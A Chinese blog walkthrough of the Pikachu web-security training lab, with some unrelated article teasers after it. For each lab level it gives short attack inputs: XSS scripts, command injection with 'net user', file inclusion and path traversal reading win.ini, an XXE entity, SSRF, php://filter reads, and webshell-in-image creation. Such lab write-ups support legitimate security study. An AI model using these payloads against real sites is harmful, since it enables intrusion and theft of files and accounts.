当前位置：首页 > news >正文

pikachu[皮卡丘] 靶场全级别通关教程答案以及学习方法如何通过渗透测试靶场挑战「pikachu」来精通Web渗透技巧？一篇文章搞完这些问题

news 来源：原创 2025/5/21 22:22:42

Pikachu靶场

部署

暴力破解漏洞

学习地址:

靶场练习:

基于表单的暴力破解

验证码绕过(on server)

验证码绕过(on Client)

token防爆破?

XSS跨站脚本攻击

学习地址:

靶场练习：

反射型xss(get)

反射性xss(post)

存储型xss

DOM型xss

xss盲打

xss之过滤

xss之htmlspecialchars

xss之href输出

xss之js输出

CSRF 跨站脚本伪造攻击

学习地址：

靶场练习:

CSRF(get) login

CSRF(post)

CSRF Token

SQL注入漏洞

直接参考这SQL注入漏洞文章：

REC命令注入漏洞

学习地址：

靶场练习：

ping || net user

exec "eval"

文件包含漏洞

学习地址：

靶场练习：

本地文件包含

远程文件包含

文件下载漏洞

学习地址：

靶场练习：

不安全的文件下载

文件上传漏洞

学习地址：

靶场学习：

客户端check（检查）

服务端check

getimagesize()

越权漏洞

学习地址:

靶场学习:

op1 member(水平越权)

op2 login(垂直越权)

目录穿越漏洞

学习地址：

靶场学习：

../../

敏感目录泄露漏洞

学习地址：

靶场学习：

find abc

反序列化漏洞

学习地址：

靶场学习：

PHP反序列化PHP反序列化

XEE漏洞(外部实现注入)

学习地址：

靶场学习：

xxe漏洞

SSRF 服务器伪造攻击

学习地址：

靶场学习：

不安全的URL跳转

SSRF(curl)

SSRF(file_get_content)

Pikachu靶场

Pikachu靶场（Pikachu CTF）是一个用于安全学习和渗透测试训练的在线靶场。它通常由网络安全爱好者和专业人员用来提高自己的安全技术，包括但不限于漏洞分析、逆向工程、Web安全、加密解密等方面。

Pikachu靶场的特点：

多样的挑战：靶场通常包括一系列的安全挑战，涵盖不同的安全领域，适合初学者和高级渗透测试人员。
互动性：用户可以在线提交解题方案，并在挑战过程中获得实时反馈。
开源：一些版本的Pikachu靶场是开源的，用户可以自行部署，进行自定义配置。
学习社区：Pikachu靶场通常有一个学习社区，参与者可以分享经验、解题技巧，甚至挑战自己设计的问题。

下载和访问：

Pikachu靶场的下载链接和访问方式可能会随时间有所变动，因此我建议你搜索它的最新版本或官方信息。
你可以在GitHub或类似平台上搜索Pikachu CTF，查看是否有相关的开源项目。

git clone https://github.com/Pikachu-CTF/Pikachu.git
cd Pikachu

例如，你可以在GitHub上搜索 "Pikachu CTF" 或直接访问一些在线CTF平台，如 CTFtime 或 Hack The Box，这些平台经常提供相关的靶场和挑战内容。

部署

网上一大堆这个自己百度 google即可

暴力破解漏洞

学习地址:

渗透测试暴力破解之【多次搞搞你】大家对这个技术都熟悉都喜欢玩这个，这篇文章就教会你如何玩暴力破解哦!_渗透测试双因子-CSDN博客

Web渗透测试之暴力破解高阶手法表单破解限制绕过-CSDN博客

靶场练习:

基于表单的暴力破解

使用BP发送到攻击器进行表单暴力破解

查看字段长度判断暴力破解的成功

验证码绕过(on server)

抓包服务端验证可能会存在时间限制
所以可以在这段时间暴力破解
验证码在后台不过期

破解成功服务端验证码校验

验证码绕过(on Client)

token防爆破?

这个查看这篇文章中的【暴力破解之token值】有讲这种手法如何破解

Web渗透测试之暴力破解高阶手法表单破解限制绕过-CSDN博客文章浏览阅读1.1w次，点赞9次，收藏29次。破解mysql:简单来说就是将密码进行逐个推算直到找出真正的密码为止暴力破解分类:暴力破解需要考虑的问题：持续不断发送尝试登录的请求用户名字典。密码字典。基于不同的响应信息来判断是否正确。任何的暴力破解都是要基于用户名密码字典的强大与否任何一天都能破解成功。暴力破解分BS 和 CS。字典大家也可以去网上找还可能找到各种web服务器应用程序的账号密码字典github等等一些地方。判断是否有复杂密码随便找到一个网站，https://blog.csdn.net/zhzx123aa/article/details/145061493https://blog.csdn.net/zhzx123aa/article/details/145061493https://blog.csdn.net/zhzx123aa/article/details/145061493https://blog.csdn.net/zhzx123aa/article/details/145061493https://blog.csdn.net/zhzx123aa/article/details/145061493https://blog.csdn.net/zhzx123aa/article/details/145061493https://blog.csdn.net/zhzx123aa/article/details/145061493

XSS跨站脚本攻击

学习地址:

XSS-Web渗透测试最全面的XSS跨站脚本注入知识点给你说说的明明白白多篇文章持续更新-CSDN博客

靶场练习：

反射型xss(get)

删除字符限制

输入: <ScRipT>alert('XSS')</ScRiPt>

反射性xss(post)

抓包：

admin
123456

提交xss：
<script>alert('xss')</script>

退出再登陆

存储型xss

输入xss:
<script>alert('xss')</script>

DOM型xss

输入xss：

' onclick=alert('xss')>

闭合语句:

<a href='' onclick=alert(‘xss’)>'>what do you see?</a>

xss盲打

盲打一般都是打后台

提交以后无反应进入后台查看

http://ip/pikachu/vul/xss/xssblind/admin_login.php

登陆到后台查看就跑出来了XSS 这也就是盲打

xss之过滤

也就是waf绕过的相关方式方法

<a href="" onclick="alert('xss')">

xss之htmlspecialchars

实体编码绕过参考这篇文章：Web渗透测试之XSS跨站脚本攻击一篇文章实体编码以及伪协议Javascript给你说明白-CSDN博客

' onclick='alert("xss")

xss之href输出

伪协议

javascript:alert(1)

xss之js输出

</script><script>alert('xss')</script>

CSRF 跨站脚本伪造攻击

学习地址：

渗透测试之什么叫 CSRF【跨站脚本伪造】攻击手法OR防御手简单教会你玩玩钓鱼手法呀-CSDN博客

靶场练习:

CSRF(get) login

随便登陆一个用户

生成poc

生成poc点击后在含有cookie的浏览器登陆这样受害者数据就被修改了
这样就是跨站脚本伪造了

CSRF(post)

和get方式方法一样只是请求的方法不一样

CSRF Token

暴力破解中使用的token原理

这个查看这篇文章中的【暴力破解之token值】有讲这种手法如何破解
Web渗透测试之暴力破解高阶手法表单破解限制绕过-CSDN博客文章浏览阅读1.1w次，点赞9次，收藏29次。破解mysql:简单来说就是将密码进行逐个推算直到找出真正的密码为止暴力破解分类:暴力破解需要考虑的问题：持续不断发送尝试登录的请求用户名字典。密码字典。基于不同的响应信息来判断是否正确。任何的暴力破解都是要基于用户名密码字典的强大与否任何一天都能破解成功。暴力破解分BS 和 CS。字典大家也可以去网上找还可能找到各种web服务器应用程序的账号密码字典github等等一些地方。判断是否有复杂密码随便找到一个网站，https://blog.csdn.net/zhzx123aa/article/details/145061493?sharetype=blogdetail&sharerId=145061493&sharerefer=PC&sharesource=zhzx123aa&spm=1011.2480.3001.8118https://blog.csdn.net/zhzx123aa/article/details/145061493?sharetype=blogdetail&sharerId=145061493&sharerefer=PC&sharesource=zhzx123aa&spm=1011.2480.3001.8118https://blog.csdn.net/zhzx123aa/article/details/145061493?sharetype=blogdetail&sharerId=145061493&sharerefer=PC&sharesource=zhzx123aa&spm=1011.2480.3001.8118https://blog.csdn.net/zhzx123aa/article/details/145061493?sharetype=blogdetail&sharerId=145061493&sharerefer=PC&sharesource=zhzx123aa&spm=1011.2480.3001.8118https://blog.csdn.net/zhzx123aa/article/details/145061493?sharetype=blogdetail&sharerId=145061493&sharerefer=PC&sharesource=zhzx123aa&spm=1011.2480.3001.8118https://blog.csdn.net/zhzx123aa/article/details/145061493?sharetype=blogdetail&sharerId=145061493&sharerefer=PC&sharesource=zhzx123aa&spm=1011.2480.3001.8118https://blog.csdn.net/zhzx123aa/article/details/145061493?sharetype=blogdetail&sharerId=145061493&sharerefer=PC&sharesource=zhzx123aa&spm=1011.2480.3001.8118https://blog.csdn.net/zhzx123aa/article/details/145061493?sharetype=blogdetail&sharerId=145061493&sharerefer=PC&sharesource=zhzx123aa&spm=1011.2480.3001.8118

SQL注入漏洞

直接参考这SQL注入漏洞文章：

https://blog.csdn.net/zhzx123aa/category_12686945.html?spm=1001.2014.3001.5482https://blog.csdn.net/zhzx123aa/category_12686945.html?spm=1001.2014.3001.5482https://blog.csdn.net/zhzx123aa/category_12686945.html?spm=1001.2014.3001.5482https://blog.csdn.net/zhzx123aa/category_12686945.html?spm=1001.2014.3001.5482https://blog.csdn.net/zhzx123aa/category_12686945.html?spm=1001.2014.3001.5482https://blog.csdn.net/zhzx123aa/category_12686945.html?spm=1001.2014.3001.5482https://blog.csdn.net/zhzx123aa/category_12686945.html?spm=1001.2014.3001.5482https://blog.csdn.net/zhzx123aa/category_12686945.html?spm=1001.2014.3001.5482

这篇文章融合了sql注入的所有知识点
其中每个sql注入知识点的案例都是用的pikachu中sql注入靶场案例直接参看就可以了

REC命令注入漏洞

学习地址：

渗透测试之远程命令执行漏洞示例 RCE-CSDN博客

靶场练习：

ping || net user

ping || net user

exec "eval"

phpinfo();

文件包含漏洞

学习地址：

渗透测试之文件包含漏洞超详细的文件包含漏洞文章-CSDN博客

靶场练习：

本地文件包含

命令:

http://192.168.1.6/pikachu/vul/fileinclude/fi_local.php?filename=file2.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

读取本地文件

?filename=C:/../../../../Windows\win.ini&submit=提交查询

远程文件包含

http://192.168.1.6/pikachu/vul/fileinclude/fi_remote.php?filename=http://www.baidu.com&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

比如说我们本地搭建了一个程序编写了一个webshell，然后通过远程文件包含漏洞访问本地搭建的服务中的webshell文件，实现对肉鸡的控制。

文件下载漏洞

学习地址：

渗透测试之文件读取漏洞结合目录穿越漏洞[---]搞定文件下载漏洞获取敏感文件进入后渗透的模式-CSDN博客

靶场练习：

不安全的文件下载

点击文件名称抓包

GET /pikachu/vul/unsafedownload/execdownload.php?filename=pj.png HTTP/1.1
通过文件包含漏洞路径创越下载
这个是通过web目录扫描找到项目结构找到文件，然后通过文件下载漏洞下载对应文件。

execdownload.php?filename=../../../index.php

文件上传漏洞

学习地址：

渗透测试之任意文件上传漏洞以及绕过方式详解_文件上传漏洞图片绕过-CSDN博客

靶场学习：

客户端check（检查）

服务端check

抓包
修改Content-Type: text/html 这个牵扯到 Mime 类型看一下上面的文章

getimagesize()

getimagesize() 是php的一个函数

其余的语言也有类似的函数检测图片是不是一张真的图片

为什么要做这样的检测？道理很简单

因为图片不是一张真的图片就可以存在图片马【图片中含有一句话木马】

生成图片马

copy copy /b 图片.jpg + 木马.php 合成的文件名.jpg

上传图片马加上文件包含漏洞读取这样的漏洞

越权漏洞

学习地址:

渗透测试之越权漏洞详解水平越权垂直越权目录越权 SQL跨库查询越权以及未授权漏洞一篇文章说明白-CSDN博客

靶场学习:

op1 member(水平越权)

看一下url路径含有用户名称修改这个用户名称

http://192.168.1.6/pikachu/vul/overpermission/op1/op1_mem.php?username=lucy&submit=%E7%82%B9%E5%87%BB%E6%9F%A5%E7%9C%8B%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF

op2 login(垂直越权)

准备普通用户

准备超级管理用户添加用户

把普通用户的userID 转到管理员的UserID 如果成功则普通用户可以操作管理员的行为

目录穿越漏洞

学习地址：

渗透测试之文件读取漏洞结合目录穿越漏洞[---]搞定文件下载漏洞获取敏感文件进入后渗透的模式-CSDN博客

靶场学习：

../../

url地址

http://192.168.1.6/pikachu/vul/dir/dir_list.php?title=jarheads.php

目录创越读取文件

?title=C:../../../../../../windows\win.ini

http://192.168.1.6/pikachu/vul/dir/dir_list.php?title=C:../../../../../../windows\win.ini

敏感目录泄露漏洞

学习地址：

靶场学习：

find abc

查看页面源码

反序列化漏洞

学习地址：

靶场学习：

PHP反序列化PHP反序列化

<?php
class S{var $test="<script>alert(document.cookie)</script>";
}$a=new S();
echo serialize($a)
?>

XEE漏洞(外部实现注入)

学习地址：

渗透测试之XEE[外部实体注入]漏洞原理攻击手法 xml语言结构防御手法-CSDN博客

靶场学习：

xxe漏洞

payload

<?xml version="1.0"?>
<!DOCTYPE ANY [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> ]>
<a>&xxe;</a>

SSRF 服务器伪造攻击

学习地址：

渗透测试之SSRF漏洞原理危害产生的原因探测手法防御手法绕过手法限制的手段_ssrf 绕过ftp限制-CSDN博客

靶场学习：

不安全的URL跳转

?url=http://www.baidu.com

成功跳转到百度页面

SSRF(curl)

http://192.168.1.6/pikachu/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1/pikachu/vul/ssrf/ssrf_info/info1.php

读取文件 ssrf伪造攻击

SSRF(file_get_content)

这里的利用方式与上一关相同，不同一点是这里可以使用php的伪协议了

比如，可以使用php://filter读取文件

?file=PHP://filter/read=convert.base64-encode/resource=c:../../../windows/win.ini

喜欢本文的请动动小手点个赞，收藏一下，有问题请下方评论，转载请注明出处，并附有原文链接，谢谢！如有侵权，请及时联系。

pikachu[皮卡丘] 靶场全级别通关教程答案以及学习方法如何通过渗透测试靶场挑战「pikachu」来精通Web渗透技巧？一篇文章搞完这些问题

目录 Pikachu靶场部署暴力破解漏洞学习地址: 靶场练习: 基于表单的暴力破解验证码绕过(on server) 验证码绕过(on Client) token防爆破? XSS跨站脚本攻击学习地址: 靶场练习： 反射型xss(get) 反射性xss(post) 存储型xss DOM型xss xss盲打 x…...

编程日记 2025/5/21 22:22:42

ai智能DeepSeek 在 Cursor 中的配置与应用实践

DeepSeek 是一款高效的深度搜索引擎，能够为开发者提供更智能、更精准的搜索体验。在数据量大、查询复杂的场景中，DeepSeek 能够帮助提升查询的响应速度和精确度。本文将介绍 DeepSeek 在 Cursor 中的配置与应用，帮助开发者理解如何在实际开发…...

编程日记 2025/5/20 23:02:07

登录到docker里

在Docker中登录到容器通常有两种情况： 登录到正在运行的容器内部：如果你想要进入到正在运行的容器内部，可以使用docker exec命令。登录到容器中并启动一个shell：如果你想要启动一个容器，并在其中启动一个shell&…...

编程日记 2025/5/21 21:47:58

【大数据技术】搭建完全分布式高可用大数据集群（Kafka）

搭建完全分布式高可用大数据集群（Kafka） kafka_2.13-3.9.0.tgz注：请在阅读本篇文章前，将以上资源下载下来。写在前面本文主要介绍搭建完全分布式高可用集群 Kafka 的详细步骤。注意：统一约定将软件安装包存放于虚拟机的/software目录下，软件安装至/opt目录下。安…...

编程日记 2025/5/19 19:18:00

Java 大视界 -- Java 大数据在智能供应链中的应用与优化（76）

💖亲爱的朋友们，热烈欢迎来到青云交的博客！能与诸位在此相逢，我倍感荣幸。在这飞速更迭的时代，我们都渴望一方心灵净土，而我的博客正是这样温暖的所在。这里为你呈上趣味与实用兼具的知识，也…...

编程日记 2025/5/21 12:36:53

10.单例模式 (Singleton Pattern)

单例模式的定义单例模式（Singleton Pattern） 是一种创建型设计模式，确保一个类在整个程序生命周期中只能有一个实例，并提供一个全局访问点。特点： 唯一性：保证系统中某个类只能有一个实例。全局访问点…...

编程日记 2025/5/21 0:43:38

Docker 常见问题解决方法

云原生学习路线导航页（持续更新中） kubernetes学习系列快捷链接 Kubernetes架构原则和对象设计（一）Kubernetes架构原则和对象设计（二）Kubernetes架构原则和对象设计（三）Kubernetes常…...

编程日记 2025/5/19 19:17:47

QT-面试

1. C（特别是 Qt）开发中，内存优化的方法 1. 合理管理对象生命周期，使用智能指针 Qt 提供了 QScopedPointer 和 QSharedPointer 来管理对象生命周期，避免手动 delete 导致的内存泄漏。 2. 减少内存占用 QString、QBy…...

编程日记 2025/5/20 19:07:25

使用java代码操作rabbitMQ收发消息

SpringAMQP 将来我们开发业务功能的时候，肯定不会在控制台收发消息，而是应该基于编程的方式。由于RabbitMQ采用了AMQP协议，因此它具备跨语言的特性。任何语言只要遵循AMQP协议收发消息，都可以与RabbitMQ交互。并且RabbitMQ官方也…...

编程日记 2025/5/20 15:53:37

LeetCode 128: 最长连续序列

LeetCode 128: 最长连续序列题目: 给定一个未排序的整数数组 nums ，找出数字连续的最长序列（不要求序列元素在原数组中连续）的长度。请你设计并实现时间复杂度为 O(n) 的算法解决此问题。示例 1： 输入：nums […...

编程日记 2025/5/20 21:37:41

Shapefile格式文件解析和显示

Java实现GIS SHP文件格式的解析和显示，JDK19下编译，awt图形系统显示。 SHP文件对应的属性存储在DBF格式数据库中，解析见：DBASE DBF数据库文件解析_数据库文件在线解析-CSDN博客解析SHP文件代码： public static Shap…...

编程日记 2025/5/21 3:40:00

华为昇腾Altas产品查询——常用命令汇总记录

参考链接： 【2024第一期CANN训练营】Altas产品查询CANN软件包版本等信息npu-smi Atlas 中心训练服务器 6.0.0 NPU驱动和固件安装指南 06 Ascend Extension for PyTorch插件软件版本配套表以下操作适用于查询npu设备的基本信息。 #查询所有设备的基本信息 npu-smi…...

编程日记 2025/5/20 0:48:58

韶音科技：消费电子行业售后服务实现数字化转型，重塑客户服务体系

韶音科技：消费电子行业售后服务实现数字化转型，重塑客户服务体系在当今这个科技日新月异的时代，企业之间的竞争早已超越了单纯的产品质量比拼，**售后服务成为了衡量消费电子行业各品牌实力与客户满意度的关键一环。**深圳市韶音…...

编程日记 2025/5/20 4:24:27

【R语言】plyr包和dplyr包

一、plyr包 plyr扩展包主要是实现数据处理中的“分割-应用-组合”（split-apply-combine）策略。此策略是指将一个问题分割成更容易操作的部分，再对每一部分进行独立的操作，最后将各部分的操作结果组合起来。 plyr扩展包中的主要函…...

编程日记 2025/5/20 13:53:15

开发一款类似《王者荣耀》的游戏是一个复杂的系统工程，涉及多个领域的知识和技术。以下是从多个角度详细阐述如何开发的思维。

一、明确游戏定位与核心玩法游戏类型 MOBA（Multiplayer Online Battle Arena）：强调团队合作、策略性和即时战斗。确定游戏模式（如5v5、3v3等）和地图设计。核心玩法角色设计：英雄技能、属性、成长曲线。…...

编程日记 2025/5/21 4:13:49

harmonyOS生命周期详述

harmonyOS的生命周期分为app(应用)的生命周期和页面的生命周期函数两部分应用的生命周期-app应用在app.js中写逻辑,具体有哪些生命周期函数呢,请看下图: onCreated()、onShow()、onHide()、onDestroy()这五部分页面及组件生命周期着重说下onShow和onHide,分别代表是不是…...

编程日记 2025/5/16 14:57:36

Deepseek本地部署指南：在linux服务器部署，在mac远程web-ui访问

1. 在Linux服务器上部署DeepSeek模型要在 Linux 上通过 Ollama 安装和使用模型，您可以按照以下步骤进行操作： 步骤 1：安装 Ollama 安装 Ollama： 使用以下命令安装 Ollama： curl -sSfL https://ollama.com/download.…...

编程日记 2025/5/18 15:18:25

ESP8266+STM32+阿里云保姆级教程（AT指令+MQTT）

前言：在开发过程中，几乎踩便了所有大坑小坑总结出的文章，我是把坑踩满了，帮助更过小白快速上手，如有错误之处，还麻烦各位大佬帮忙指正、目录一、ESP-01s介绍 1、ESP-01s管脚功能： 模组启动模…...

编程日记 2025/5/18 20:29:27

【蓝桥杯嵌入式】4_key：单击+长按+双击

全部代码网盘自取链接：https://pan.baidu.com/s/1PX2NCQxnADxYBQx5CsOgPA?pwd3ii2 提取码：3ii2 1、电路图将4个按键的引脚设置为input，并将初始状态设置为Pull-up（上拉输入） 为解决按键抖动的问题，我们…...

编程日记 2025/5/21 14:45:47

TCP队头阻塞问题以及QUIC解决方案

TCP队头阻塞（Head-of-Line Blocking）问题问题描述 TCP是面向字节流的可靠传输协议，要求数据按严格顺序到达接收端。若某个数据包在传输过程中丢失、延迟或乱序，会导致以下问题：后续数据被阻塞：接收端必须等待丢失/延迟的包重传并正确接收后，才能将后续已到达的数据交…...

编程日记 2025/5/21 8:46:49

idea启动报错# EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x00007ffccf76e433

# EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc0x00007ffccf76e433, pid17288, tid6696 # # JRE version: (11.0.248) (build ) # Java VM: OpenJDK 64-Bit Server VM (11.0.248-LTS, mixed mode, sharing, tiered, compressed oops, g1 gc, windows-amd64) 不知道为什么…...

编程日记 2025/5/20 19:05:01

Pikachu靶场

Pikachu靶场的特点：

下载和访问：

部署

暴力破解漏洞

学习地址:

靶场练习:

基于表单的暴力破解

验证码绕过(on server)

验证码绕过(on Client)

token防爆破?

XSS跨站脚本攻击

学习地址:

靶场练习：

反射型xss(get)

反射性xss(post)

存储型xss

DOM型xss

xss盲打

xss之过滤

xss之htmlspecialchars

xss之href输出

xss之js输出

CSRF 跨站脚本伪造攻击

学习地址：

靶场练习:

CSRF(get) login

CSRF(post)

CSRF Token

SQL注入漏洞

直接参考这SQL注入漏洞文章：

REC命令注入漏洞

学习地址：

靶场练习：

ping || net user

exec "eval"

文件包含漏洞

学习地址：

靶场练习：

本地文件包含

远程文件包含

文件下载漏洞

学习地址：

靶场练习：

不安全的文件下载

文件上传漏洞

学习地址：

靶场学习：

客户端check（检查）

服务端check

getimagesize()

越权漏洞

学习地址:

靶场学习:

op1 member(水平越权)

op2 login(垂直越权)

目录穿越漏洞

学习地址：

靶场学习：

../../

敏感目录泄露漏洞

学习地址：

靶场学习：

find abc

反序列化漏洞

学习地址：

靶场学习：

PHP反序列化PHP反序列化

XEE漏洞(外部实现注入)

学习地址：

靶场学习：

xxe漏洞

SSRF 服务器伪造攻击

学习地址：

靶场学习：

不安全的URL跳转

SSRF(curl)

SSRF(file_get_content)

相关文章：